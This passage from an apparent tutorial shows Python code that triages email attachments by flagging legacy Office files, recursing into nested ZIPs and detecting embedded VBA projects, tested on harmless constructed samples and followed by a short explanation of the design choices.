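    if ext in LEGACY_OFFICE_EXT:
        reasons.append(f"{filename}: legacy binary Office document (macros possible)")
    if ext in ARCHIVE_EXT or ext in OOXML_EXT:
        try:
            archive = zipfile.ZipFile(io.BytesIO(data))
        except zipfile.BadZipFile:
            reasons.append(f"{filename}: not a valid ZIP container")
            return reasons
        members = [n for n in archive.namelist() if not n.endswith("/")]
        if ext in ARCHIVE_EXT:
            if depth >= MAX_ARCHIVE_DEPTH:
                reasons.append(f"{filename}: archive nested too deep")
            else:
                for member in members:   # recurse: zip-in-zip is a common wrapper
                    reasons.extend(triage_attachment(member, archive.read(member), depth + 1))
        elif any(n.lower().endswith("vbaproject.bin") for n in members):
            # An OOXML document with macros carries a vbaProject.bin part.
            reasons.append(f"{filename}: OOXML document with embedded VBA project")
    return reasons


def build_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples (no real malware): a script inside a folder inside a ZIP,
# in the shape of the Photo.zip / FedEx_track ZIPs above, a clean archive, and
# a .docx that smuggles a VBA project despite its macro-free extension.
SAMPLES = {
    "Photo.zip": build_zip({"Photo/document_12345.js": b"var x = 1;"}),
    "minutes.zip": build_zip({"minutes.txt": b"nothing to see"}),
    "report.docx": build_zip({"[Content_Types].xml": b"<Types/>",
                              "word/document.xml": b"<w:document/>",
                              "word/vbaProject.bin": b"\xd0\xcf\x11\xe0"}),
}


def triage_all(samples=SAMPLES) -> dict:
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, reasons in triage_all().items():
        print(name, "REJECT" if reasons else "ok", reasons)
```

A gateway that only matches on the outer filename never sees `document_12345.js` inside `Photo.zip`, which is why the walk into the archive is the useful part. The legacy .doc/.xls branch is deliberately conservative: without parsing the OLE container there is no cheap way to tell a macro-free .doc from one carrying a downloader, so the routine only reports the possibility and leaves the policy (strip, quarantine, or deliver with a warning) to the caller.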